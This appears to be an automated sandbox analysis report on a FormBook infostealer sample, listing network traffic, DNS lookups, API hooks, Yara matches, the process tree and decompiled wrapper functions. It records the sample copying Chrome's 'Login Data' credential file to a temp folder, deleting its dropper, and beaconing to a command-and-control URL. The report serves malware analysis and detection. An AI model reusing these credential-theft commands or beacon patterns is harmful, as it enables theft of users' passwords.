May 4, 2021 12:32:27.062938929 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.062956095 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.062983990 CEST	443	49740	162.159.134.233	192.168.2.4
May 4, 2021 12:32:27.063000917 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.063041925 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.063074112 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.255871058 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:27.290252924 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:45.923074961 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:34:10.551758051 CEST	49776	80	192.168.2.4	199.192.24.139
May 4, 2021 12:34:10.739636898 CEST	80	49776	199.192.24.139	192.168.2.4
May 4, 2021 12:34:10.739759922 CEST	49776	80	192.168.2.4	199.192.24.139
May 4, 2021 12:34:10.740039110 CEST	49776	80	192.168.2.4	199.192.24.139
May 4, 2021 12:34:10.927767038 CEST	80	49776	199.192.24.139	192.168.2.4
May 4, 2021 12:34:11.049376965 CEST	80	49776	199.192.24.139	192.168.2.4
May 4, 2021 12:34:11.049426079 CEST	80	49776	199.192.24.139	192.168.2.4
May 4, 2021 12:34:11.049631119 CEST	49776	80	192.168.2.4	199.192.24.139
May 4, 2021 12:34:11.243233919 CEST	49776	80	192.168.2.4	199.192.24.139
May 4, 2021 12:34:11.431212902 CEST	80	49776	199.192.24.139	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 12:32:17.199568033 CEST	62389	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:17.248075962 CEST	53	62389	8.8.8.8	192.168.2.4
May 4, 2021 12:32:17.290143013 CEST	49910	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:17.341527939 CEST	53	49910	8.8.8.8	192.168.2.4
May 4, 2021 12:32:19.044538975 CEST	55854	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:19.097281933 CEST	53	55854	8.8.8.8	192.168.2.4
May 4, 2021 12:32:19.849503040 CEST	64549	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:19.898332119 CEST	53	64549	8.8.8.8	192.168.2.4
May 4, 2021 12:32:20.972541094 CEST	63153	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:21.021675110 CEST	53	63153	8.8.8.8	192.168.2.4
May 4, 2021 12:32:22.408405066 CEST	52991	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:22.468358040 CEST	53	52991	8.8.8.8	192.168.2.4
May 4, 2021 12:32:23.822503090 CEST	53700	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:23.873940945 CEST	53	53700	8.8.8.8	192.168.2.4
May 4, 2021 12:32:25.636130095 CEST	51726	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:25.687604904 CEST	53	51726	8.8.8.8	192.168.2.4
May 4, 2021 12:32:26.188683987 CEST	56794	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:26.247744083 CEST	53	56794	8.8.8.8	192.168.2.4
May 4, 2021 12:32:26.719970942 CEST	56534	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:26.768537998 CEST	53	56534	8.8.8.8	192.168.2.4
May 4, 2021 12:32:28.173047066 CEST	56627	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:28.224559069 CEST	53	56627	8.8.8.8	192.168.2.4
May 4, 2021 12:32:29.364722013 CEST	56621	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:29.413427114 CEST	53	56621	8.8.8.8	192.168.2.4
May 4, 2021 12:32:30.472744942 CEST	63116	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:30.521408081 CEST	53	63116	8.8.8.8	192.168.2.4
May 4, 2021 12:32:31.669836044 CEST	64078	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:31.719865084 CEST	53	64078	8.8.8.8	192.168.2.4
May 4, 2021 12:32:32.635464907 CEST	64801	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:32.685698032 CEST	53	64801	8.8.8.8	192.168.2.4
May 4, 2021 12:32:33.739288092 CEST	61721	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:33.787842035 CEST	53	61721	8.8.8.8	192.168.2.4
May 4, 2021 12:32:34.505415916 CEST	51255	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:34.556938887 CEST	53	51255	8.8.8.8	192.168.2.4
May 4, 2021 12:32:35.534353018 CEST	61522	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:35.585870981 CEST	53	61522	8.8.8.8	192.168.2.4
May 4, 2021 12:32:37.492779016 CEST	52337	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:37.551907063 CEST	53	52337	8.8.8.8	192.168.2.4
May 4, 2021 12:32:38.628535032 CEST	55046	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:38.677088976 CEST	53	55046	8.8.8.8	192.168.2.4
May 4, 2021 12:32:39.481079102 CEST	49612	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:39.531080008 CEST	53	49612	8.8.8.8	192.168.2.4
May 4, 2021 12:32:46.716998100 CEST	49285	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:46.768604040 CEST	53	49285	8.8.8.8	192.168.2.4
May 4, 2021 12:32:51.908709049 CEST	50601	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:51.971647978 CEST	53	50601	8.8.8.8	192.168.2.4
May 4, 2021 12:33:12.303430080 CEST	60875	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:12.364641905 CEST	53	60875	8.8.8.8	192.168.2.4
May 4, 2021 12:33:13.272196054 CEST	56448	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:13.333528042 CEST	53	56448	8.8.8.8	192.168.2.4
May 4, 2021 12:33:14.214854002 CEST	59172	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:14.271964073 CEST	53	59172	8.8.8.8	192.168.2.4
May 4, 2021 12:33:15.541210890 CEST	62420	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:15.598345041 CEST	53	62420	8.8.8.8	192.168.2.4
May 4, 2021 12:33:16.093295097 CEST	60579	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:16.142273903 CEST	53	60579	8.8.8.8	192.168.2.4
May 4, 2021 12:33:16.670310020 CEST	50183	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:16.733364105 CEST	53	50183	8.8.8.8	192.168.2.4
May 4, 2021 12:33:17.293353081 CEST	61531	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:17.350528002 CEST	53	61531	8.8.8.8	192.168.2.4
May 4, 2021 12:33:17.833003998 CEST	49228	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:17.890403986 CEST	53	49228	8.8.8.8	192.168.2.4
May 4, 2021 12:33:18.601878881 CEST	59794	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:18.659068108 CEST	53	59794	8.8.8.8	192.168.2.4
May 4, 2021 12:33:19.836004972 CEST	55916	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:19.892992973 CEST	53	55916	8.8.8.8	192.168.2.4
May 4, 2021 12:33:20.525589943 CEST	52752	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:20.583003044 CEST	53	52752	8.8.8.8	192.168.2.4
May 4, 2021 12:33:20.607251883 CEST	60542	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:20.669703007 CEST	53	60542	8.8.8.8	192.168.2.4
May 4, 2021 12:33:24.845662117 CEST	60689	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:24.909626007 CEST	53	60689	8.8.8.8	192.168.2.4
May 4, 2021 12:33:50.169877052 CEST	64206	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:50.233441114 CEST	53	64206	8.8.8.8	192.168.2.4
May 4, 2021 12:33:55.900505066 CEST	50904	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:55.949421883 CEST	53	50904	8.8.8.8	192.168.2.4
May 4, 2021 12:33:57.807470083 CEST	57525	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:57.881582975 CEST	53	57525	8.8.8.8	192.168.2.4
May 4, 2021 12:34:10.449276924 CEST	53814	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:10.547678947 CEST	53	53814	8.8.8.8	192.168.2.4
May 4, 2021 12:34:36.388665915 CEST	53418	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:36.454451084 CEST	53	53418	8.8.8.8	192.168.2.4
May 4, 2021 12:34:38.470271111 CEST	62833	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:38.532393932 CEST	53	62833	8.8.8.8	192.168.2.4
May 4, 2021 12:34:38.535073042 CEST	59260	53	192.168.2.4	8.8.8.8
May 4, 2021 12:34:38.594563007 CEST	53	59260	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 12:32:26.188683987 CEST	192.168.2.4	8.8.8.8	0x351	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
May 4, 2021 12:33:50.169877052 CEST	192.168.2.4	8.8.8.8	0x748b	Standard query (0)	www.589man.com	A (IP address)	IN (0x0001)
May 4, 2021 12:34:10.449276924 CEST	192.168.2.4	8.8.8.8	0x72e	Standard query (0)	www.joomlas123.info	A (IP address)	IN (0x0001)
May 4, 2021 12:34:36.388665915 CEST	192.168.2.4	8.8.8.8	0x1715	Standard query (0)	www.beepot.tech	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.470271111 CEST	192.168.2.4	8.8.8.8	0x4de1	Standard query (0)	www.beepot.tech	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.535073042 CEST	192.168.2.4	8.8.8.8	0x509f	Standard query (0)	www.beepot.tech	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
May 4, 2021 12:32:26.247744083 CEST	8.8.8.8	192.168.2.4	0x351	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
May 4, 2021 12:33:50.233441114 CEST	8.8.8.8	192.168.2.4	0x748b	Name error (3)	www.589man.com	none	none	A (IP address)	IN (0x0001)
May 4, 2021 12:34:10.547678947 CEST	8.8.8.8	192.168.2.4	0x72e	No error (0)	www.joomlas123.info		199.192.24.139	A (IP address)	IN (0x0001)
May 4, 2021 12:34:36.454451084 CEST	8.8.8.8	192.168.2.4	0x1715	Name error (3)	www.beepot.tech	none	none	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.532393932 CEST	8.8.8.8	192.168.2.4	0x4de1	Name error (3)	www.beepot.tech	none	none	A (IP address)	IN (0x0001)
May 4, 2021 12:34:38.594563007 CEST	8.8.8.8	192.168.2.4	0x509f	Name error (3)	www.beepot.tech	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.joomlas123.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49776	199.192.24.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 12:34:10.740039110 CEST	9644	OUT	GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1 Host: www.joomlas123.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 4, 2021 12:34:11.049376965 CEST	9644	IN	HTTP/1.1 404 Not Found Date: Tue, 04 May 2021 10:34:10 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 328 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6f 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nop/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 4, 2021 12:32:26.384680033 CEST	162.159.134.233	443	192.168.2.4	49739	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
May 4, 2021 12:32:26.384680033 CEST	162.159.134.233	443	192.168.2.4	49739	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xB3 0x3C
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x33 0x3C
GetMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x33 0x3C
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xB3 0x3C

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: f97e137e_by_Libranalysis.exe PID: 6944 Parent PID: 5940

General

Start time:	12:32:24
Start date:	04/05/2021
Path:	C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe'
Imagebase:	0x400000
File size:	823808 bytes
MD5 hash:	F97E137E249BB393FD88B7DEC1DDF9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: secinit.exe PID: 4112 Parent PID: 6944

General

Start time:	12:32:40
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\secinit.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\secinit.exe
Imagebase:	0x390000
File size:	9728 bytes
MD5 hash:	174A363BB5A2D88B224546C15DD10906
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 4112

General

Start time:	12:32:43
Start date:	04/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ipconfig.exe PID: 1904 Parent PID: 3424

General

Start time:	12:33:01
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\ipconfig.exe
Imagebase:	0x1090000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5544 Parent PID: 1904

General

Start time:	12:33:07
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Windows\SysWOW64\secinit.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6856 Parent PID: 5544

General

Start time:	12:33:07
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3788 Parent PID: 1904

General

Start time:	12:34:17
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4388 Parent PID: 3788

General

Start time:	12:34:18
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vp21b7dsh.exe PID: 2188 Parent PID: 3424

General

Start time:	12:34:20
Start date:	04/05/2021
Path:	C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe
Imagebase:	0xf10000
File size:	9728 bytes
MD5 hash:	174A363BB5A2D88B224546C15DD10906
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: secinit.exe PID: 4112 Parent PID: 6944 secinit.exeCOMMON

Executed Functions

Function 1042984A, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1042984A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;
				void* _t34;

				_t18 = _a4;
				_t3 = _t18 + 0xc40; // 0xc40
				E1042A1A0(_t34, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}

0x10429853
0x1042985f
0x10429867
0x1042989d
0x104298a1

APIs

NtCreateFile.NTDLL(00000060,10419E13,?,10424CC7,10419E13,FFFFFFFF,?,?,FFFFFFFF,10419E13,10424CC7,?,10419E13,00000060,00000000,00000000), ref: 1042989D

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c7c90f656ec6f784e4adaf33b82b8cdae8e2f9cb578cccc17dc95d6aeefb7fbe
Instruction ID: 97a05e1c4212c6cfc292457673f43fc32d089dd8035e8184984d385e111696b9
Opcode Fuzzy Hash: c7c90f656ec6f784e4adaf33b82b8cdae8e2f9cb578cccc17dc95d6aeefb7fbe
Instruction Fuzzy Hash: 2F01ABB6214208ABDB08CF88DC85EEB37A9AF8C754F158248FA0997241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10429850, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10429850(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E1042A1A0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x1042985f
0x10429867
0x1042989d
0x104298a1

APIs

NtCreateFile.NTDLL(00000060,10419E13,?,10424CC7,10419E13,FFFFFFFF,?,?,FFFFFFFF,10419E13,10424CC7,?,10419E13,00000060,00000000,00000000), ref: 1042989D

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2f793678383b4d05725a50b19555622cb64a22bd4c4f36145ebbaf9ace4e611f
Instruction ID: 74cc5d7ed5ac1288f5ecb19df2b98de9533d9ff493f3b179881c318745016ded
Opcode Fuzzy Hash: 2f793678383b4d05725a50b19555622cb64a22bd4c4f36145ebbaf9ace4e611f
Instruction Fuzzy Hash: E5F0BDB2210208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 104298FB, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(10424E82,5EAE5221,FFFFFFFF,10424B41,?,?,10424E82,?,10424B41,FFFFFFFF,5EAE5221,10424E82,?,00000000), ref: 10429945

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e7e96b215f618ce59fad011e2878560b98c5900fee2d413961078c0d8f20a450
Instruction ID: f51764dc990417deb2559683b29500b85fcb26df926b677c6a8ae5c0918321a3
Opcode Fuzzy Hash: e7e96b215f618ce59fad011e2878560b98c5900fee2d413961078c0d8f20a450
Instruction Fuzzy Hash: A6F0F4B6200108AFCB14CF99DC81EEB77A9EF8C354F158248FE1DA7241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10429900, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E10429900(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E1042A1A0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x10429903
0x1042990f
0x10429917
0x10429945
0x10429949

APIs

NtReadFile.NTDLL(10424E82,5EAE5221,FFFFFFFF,10424B41,?,?,10424E82,?,10424B41,FFFFFFFF,5EAE5221,10424E82,?,00000000), ref: 10429945

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e41d586cd8cc04f93a5ff7d6774edc7877e099e6405a918b1416ec8c463979c7
Instruction ID: b5cc2d018c2e89d90de7829b87edcf0de130eaa6c1155406a775628e8a660054
